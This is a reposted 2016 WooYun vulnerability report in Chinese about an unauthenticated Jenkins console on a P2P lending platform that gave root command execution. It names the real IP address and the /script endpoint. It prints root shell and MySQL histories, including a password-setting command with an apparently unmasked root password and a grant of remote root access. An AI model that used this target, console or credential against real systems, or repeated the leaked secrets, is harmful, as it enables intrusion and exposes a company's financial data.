P2P安全之外星人理财某系统未授权访问导致命令执行/root权限

admin 2017年5月2日21:50:10评论367 views字数 246阅读0分49秒阅读模式
摘要

2016-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-24: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-182916

漏洞标题: P2P安全之外星人理财某系统未授权访问导致命令执行/root权限

相关厂商: 深圳市前海外星人理财互联网金融服务有限公司

漏洞作者: 路人甲

提交时间: 2016-03-10 13:20

公开时间: 2016-04-24 13:20

漏洞类型: 命令执行

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 未授权访问

0人收藏


漏洞详情

披露状态:

2016-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

外星人理财平台由天毕弗(TBF)集团旗下国越基金控股,股东和管理层由长期从事银行信贷业务、互联网金融、民间借贷等行业人士构成。

详细说明:

mask 区域
***** www.wai*****
*****ode*****
**********
*****ur*****
1.http://**.**.**/</code>_
**********
*****这个ip是*****
*****8ee1d4ad27a982a4b000.png&qu*****
**********
*****授权*****
2.http://**.**.**/</code>_
**********
*****c062b773dd352c04f74e.png&qu*****
**********
3.http://**.**.**/script_
**********
**********
*****9593957137ec872f4d02.png&qu*****
**********
*****tory(部*****
**********
***** /etc/yu*****
*****ar*****
*****node3.waix*****
*****ar*****
*****022 r*****
*****
*****tall *****
*****.d/jenkin*****
*****nsta*****
*****ll jen*****
*****lib</*****
**********
**********
*****etc/init.*****
*****v*****
*****ar*****
*****onfig/j*****
*****r
*****
*****pt/*****
*****pt/*****
*****s*****
*****grenl*****
*****s*****
*****sito*****
*****s*****
*****nf/*****
*****s*****
*****uth*****
*****ass*****
*****/code*****
**********
*****history *****
**********
*****how dat*****
*****wQA') where user='r*****
*****@'%' identifie*****
*****vileg*****
*****taba*****
*****tab*****
*****taba*****
*****2pt*****
*****p/aaa/p2p_20*****
*****tab*****
*****E `value` LIKE &*****
*****taba*****
*****2pt*****
*****E `value` LIKE &*****
*****lc.com','121.40.237.82*****
*****E `value` LIKE &*****
***** `value` LIKE �*****
*****lc.com','121.40.237.82*****
***** `value` LIKE �*****
*****;/cod*****
**********
*****','other') NOT NULL DEFAULT 'pc'*****
*****9;,'other') NOT NULL DEFAULT 'pc' C*****
*****;pc','other') NOT NULL COMMENT �*****
*****39;pc','other') NOT NULL COMMENT &#*****
*****;pc','other') NOT NULL COMMENT �*****
*****weixin') NOT NULL COMMENT '用户来源:前台注册*****
*****taba*****
*****2pt*****
*****039;key'=*****
*****ngrenlc.com',35,'第三方接口外网配置地*****
*****mi*****
*****
*****
*****taba*****
*****2pt*****
*****tab*****
*****,'other') NOT NULL DEFAULT 'pc' C*****
*****9;,'other') NOT NULL DEFAULT 'pc' C*****
*****;pc','other') NOT NULL COMMENT �*****
*****39;pc','other') NOT NULL COMMENT &#*****
*****;pc','other') NOT NULL COMMENT �*****
*****in') NOT NULL COMMENT '用户来源:前台注册、运*****

漏洞证明:

外星人理财官网 www.waixingrenlc.com

code 区域
漏洞url
http://121.40.237.82:8000/

ping 二级域名可以证明这个ip是外星人理财的

P2P安全之外星人理财某系统未授权访问导致命令执行/root权限

jenkins 未授权访问

http://121.40.237.82:8000/</code>

P2P安全之外星人理财某系统未授权访问导致命令执行/root权限

命令执行url

http://121.40.237.82:8000/script

root权限

P2P安全之外星人理财某系统未授权访问导致命令执行/root权限

cat /root/.bash_history(部分内容)

code 区域
vim /etc/yum.repos.d/
clear
ssh -p 61022
clear
ssh -p 61022 root
ssh -p 61022
yum reinstall zlib
mv /etc/yum.repos.d/jenkins.repo ./
yum reinstall
yum reinstall jenkins
yum reinstall zlib
code 区域
vim /etc/init.d/jenkins 
mvn
clear
vim /etc/sysconfig/jenkins
cear
cd /opt/sv
cd /opt/
ls
cd waixingrenlcsvn/
ls
cd repository/
ls
cd conf/
ls
vim authz
vim passwd
clear

cat /root/.mysql_history 部分内容

code 区域
show databases;
update mysql.user set password=password('22手工打码wQA') where user='root';//mysql密码出来咯。。
grant all privileges on *.* to 'root'@'%' identified by '22WWAAsddwQA';
flush privileges;
show databases;
show tables;
show databases;
use p2ptest;
source /home/webapps/p2p/aaa/p2p_201509171830.sql;
show tables;
SELECT * FROM sys_property WHERE `value` LIKE '%http://%';
show databases;
use p2ptest;
SELECT * FROM sys_property WHERE `value` LIKE '%http://%';
UPDATE `sys_property`set`value`=REPLACE(`value` ,'www.waixingrenlc.com','121.40.237.82') where `value` LIKE '%http://%';
SELECT * FROM sys_property WHERE `value` LIKE '%http://%';
SELECT * FROM sys_constants WHERE `value` LIKE '%http://%';
UPDATE `sys_constants`set`value`=REPLACE(`value`,'www.waixingrenlc.com','121.40.237.82') WHERE `value` LIKE '%http://%';
SELECT * FROM sys_constants WHERE `value` LIKE '%http://%';
commit
code 区域
alter table `bidding` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL DEFAULT 'pc' COMMENT '终端:依次为 安卓,苹果,微信,pc,其他' ;
alter table `debt_transfer` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL DEFAULT 'pc' COMMENT '终端:依次为 安卓,苹果,微信,pc,其他' ;
alter table `recharge` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '充值终端:依次为 安卓,苹果,微信,pc,其他';
alter table `recharge_sys` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '充值终端:依次为 安卓,苹果,微信,pc,其他';
alter table `withdraw` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '提现终端:依次为 安卓,苹果,微信,pc,其他';
alter table `user` modify `source_from` enum('front','console','apple','android','weixin') NOT NULL COMMENT '用户来源:前台注册、运营后台添加、苹果端注册、安卓端注册、微信端注册';
show databases;
use p2ptest;
select * from sys_property where 'key'='INTF_EXT_URL';
INSERT INTO sys_property VALUES('第三方接口配置','INTF_EXT_URL','http://test.waixingrenlc.com',35,'第三方接口外网配置地址,用于回调掉到第三方接口的页面通知和后台通知');
commit
;
show databases;
use p2ptest;
show tables;
alter table `bidding` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL DEFAULT 'pc' COMMENT '终端:依次为 安卓,苹果,微信,pc,其他' ;
alter table `debt_transfer` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL DEFAULT 'pc' COMMENT '终端:依次为 安卓,苹果,微信,pc,其他' ;
alter table `recharge` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '充值终端:依次为 安卓,苹果,微信,pc,其他';
alter table `recharge_sys` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '充值终端:依次为 安卓,苹果,微信,pc,其他';
alter table `withdraw` modify `terminal` enum('ad','ios','wx','pc','other') NOT NULL COMMENT '提现终端:依次为 安卓,苹果,微信,pc,其他';
alter table `user` modify `source_from` enum('front','console','apple','android','weixin') NOT NULL COMMENT '用户来源:前台注册、运营后台添加、苹果端注册、安卓端注册、微信端注册';

修复方案:

jenkins未授权访问 导致命令执行

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin